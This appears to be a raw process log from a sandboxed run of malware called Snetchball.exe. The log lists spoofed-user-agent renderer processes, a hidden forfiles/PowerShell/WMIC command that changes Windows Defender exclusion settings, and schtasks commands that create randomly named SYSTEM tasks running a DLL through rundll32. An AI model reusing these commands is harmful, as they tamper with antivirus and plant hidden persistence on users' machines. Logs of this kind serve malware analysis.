"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --mojo-platform-channel-handle=4148 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\UQtSSXvqU\HWxvob.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "OcPshDNvhDnVmSv" /V1 /F
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --mojo-platform-channel-handle=3760 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --mojo-platform-channel-handle=1964 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 5828 -ip 5828
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 1764
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --mojo-platform-channel-handle=4108 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --mojo-platform-channel-handle=1108 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5828 -ip 5828
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 1076
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "OcPshDNvhDnVmSv2" /F /xml "C:\Program Files (x86)\UQtSSXvqU\EplivAd.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "OcPshDNvhDnVmSv"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 5828 -ip 5828
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "OcPshDNvhDnVmSv"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 1388
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "qjEkZtbojbmFFd" /F /xml "C:\Program Files (x86)\AMqhlrBDqRJU2\wCaWHkT.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "SzzOVfCIijTTD2" /F /xml "C:\ProgramData\CSlqozbqXBZGgaVB\xsPdrKy.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "PiigmmnlzELKpVpJK2" /F /xml "C:\Program Files (x86)\OJBbginKvssDnbEKbsR\knrdzvi.xml" /RU "SYSTEM"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --mojo-platform-channel-handle=4052 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --mojo-platform-channel-handle=1416 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "XrMInsNlrWTcBhRONQr2" /F /xml "C:\Program Files (x86)\hMiQKFvmPLjeC\bLbuwzk.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 5828 -ip 5828
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "xRLZs1" /SC once /ST 02:04:30 /F /RU "Admin" /TR "\"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe\" --restore-last-session"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --mojo-platform-channel-handle=3840 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --mojo-platform-channel-handle=4036 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 1160
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "xRLZs1"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --restore-last-session
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd200c3cb8,0x7ffd200c3cc8,0x7ffd200c3cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1940,1948266600832568998,12638398276600011796,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1596 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1940,1948266600832568998,12638398276600011796,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1940,1948266600832568998,12638398276600011796,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2716 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1948266600832568998,12638398276600011796,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3184 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1948266600832568998,12638398276600011796,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3192 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1948266600832568998,12638398276600011796,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3552 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --mojo-platform-channel-handle=4172 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74 --mojo-platform-channel-handle=4296 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=75 --mojo-platform-channel-handle=3720 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=76 --mojo-platform-channel-handle=4344 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --mojo-platform-channel-handle=4384 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=78 --mojo-platform-channel-handle=4056 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=79 --mojo-platform-channel-handle=4440 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=80 --mojo-platform-channel-handle=4444 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=81 --mojo-platform-channel-handle=4328 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=82 --mojo-platform-channel-handle=4296 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "xRLZs1"
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "FPIEUdZLMYPzsiUNM"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 716 -ip 716
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 3184 -ip 3184
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3184 -s 1108
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 3556 -ip 3556
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 716 -s 852
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3556 -s 2060
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "wDjRE1" /SC once /ST 01:43:25 /F /RU "Admin" /TR "\"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe\" --restore-last-session"
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "wDjRE1"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --restore-last-session
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd200c3cb8,0x7ffd200c3cc8,0x7ffd200c3cd8
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
